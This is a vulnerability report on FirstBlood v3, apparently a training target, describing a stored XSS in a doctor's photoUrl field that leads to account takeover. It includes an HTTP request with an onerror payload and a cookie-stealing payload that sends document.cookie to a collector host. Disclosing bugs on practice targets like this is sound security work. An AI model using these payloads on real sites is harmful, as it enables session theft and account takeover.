FirstBlood-#1456 — Stored XSS on /meet drs.php can lead to full account takeover
This issue was discovered on FirstBlood v3
On 2022-12-10, 0xblackbird Level 5 reported:
Summary:
Hi mate!
I hope you're doing great today!
I found a stored XSS vulnerability on /meet_drs.php
passed on from /drpanel/drapi/edit-dr.php
. The doctor's photoUrl parameter is reflected in the source code without being filtered or escaped correctly on /meet_drs.php
.
Possible cause:
The developers thought that there was no way to change the path of the profile picture but forgot that invoking the API directly is still an option.
Impact:
I was able to execute javascript code on any doctor's behalf. Even more, I was also able to steal the sensitive session cookie as it is not an HTTPOnly cookie. This allowed me to successfully take over the account of the doctor.
Steps to reproduce:
1) Login using the default credentials: admin:admin
:
2) Next, replicate the following request:
POST /drpanel/drapi/edit-dr.php HTTP/1.1
Host: {HOST}
Cookie: drps={SESS_COOKIE}
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
drid=1&name=xyz&bio=&bookable=0&photoUrl=/'"+onerror="alert(document.domain)
3) Finally, visit /meet_drs.php
. A popup should be displayed with the document's domain:
We can elevate our privileges by easily taking over the doctor's account as cookies are not set to be HTTPOnly. To do so, we could put the following payload in the phone parameter to steal and send the cookies back to us:
/"+onerror="location.href=`///{BURP_COLLABORATOR}/collector?cookies=${document.cookie}`"
Next, visit the endpoint again: /meet_drs.php
Upon visiting the URL (as the victim), we can see a hit with the cookies on our server:
Mitigation
I highly recommend encoding any user input and validating it before reflecting it in the response.
Kind regards,
0xblackbird
P2 High
Endpoint: /drpanel/drapi/edit-dr.php
Parameter: photoUrl
Payload: /'"+onerror="alert(document.domain)
FirstBlood ID: 64
Vulnerability Type: Stored XSS
There is a stored XSS vulnerability on meet_drs.php from the photo of the doctor